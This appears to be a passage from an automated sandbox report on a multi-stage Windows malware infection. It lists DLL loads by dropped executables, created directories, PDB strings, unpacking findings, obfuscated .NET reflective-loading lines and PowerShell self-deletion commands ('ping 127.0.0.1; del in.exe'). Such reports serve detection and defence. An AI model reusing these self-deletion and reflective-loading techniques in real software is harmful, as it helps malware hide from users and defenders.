                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: taskschd.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samlib.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: taskschd.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: samlib.dll
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dll
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: edgegdi.dll
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: taskschd.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                        Source: file.exeStatic file information: File size 3028480 > 1048576
                        Source: file.exeStatic PE information: Raw size of syfpipoa is bigger than: 0x100000 < 0x2b1c00
                        Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269901766931.00007FFBE1BC3000.00000002.00000001.01000000.0000001D.sdmp
                        Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\win32trace.pdb source: LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269890200730.00007FFBB373C000.00000002.00000001.01000000.00000040.sdmp
                        Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269878316296.00000178E9C30000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: LoaderClient.exe, 0000002E.00000003.269780776101.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\_win32sysloader.pdb source: LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269900030970.00007FFBE131D000.00000002.00000001.01000000.0000001F.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269899355718.00007FFBE12F6000.00000002.00000001.01000000.00000025.sdmp
                        Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.660000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeUnpacked PE file: 5.2.0d47c4c34f.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 8.2.axplong.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeUnpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeUnpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs.Net Code: Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777430)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777322)),Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777257))})
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs.Net Code: Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777430)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777322)),Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777257))})
                        Source: EkmIhQM[1].exe.4.dr, hrwN54ssk66JhR0d65a.cs.Net Code: tsFkXCLB65 System.Reflection.Assembly.Load(byte[])
                        Source: EkmIhQM.exe.4.dr, hrwN54ssk66JhR0d65a.cs.Net Code: tsFkXCLB65 System.Reflection.Assembly.Load(byte[])
                        Source: wOKhy9f[1].exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
                        Source: wOKhy9f[1].exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
                        Source: wOKhy9f.exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
                        Source: wOKhy9f.exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                        Source: EkmIhQM[1].exe.4.drStatic PE information: 0xE6542668 [Sat Jun 14 09:35:36 2092 UTC]
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B966A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,12_2_00B966A8
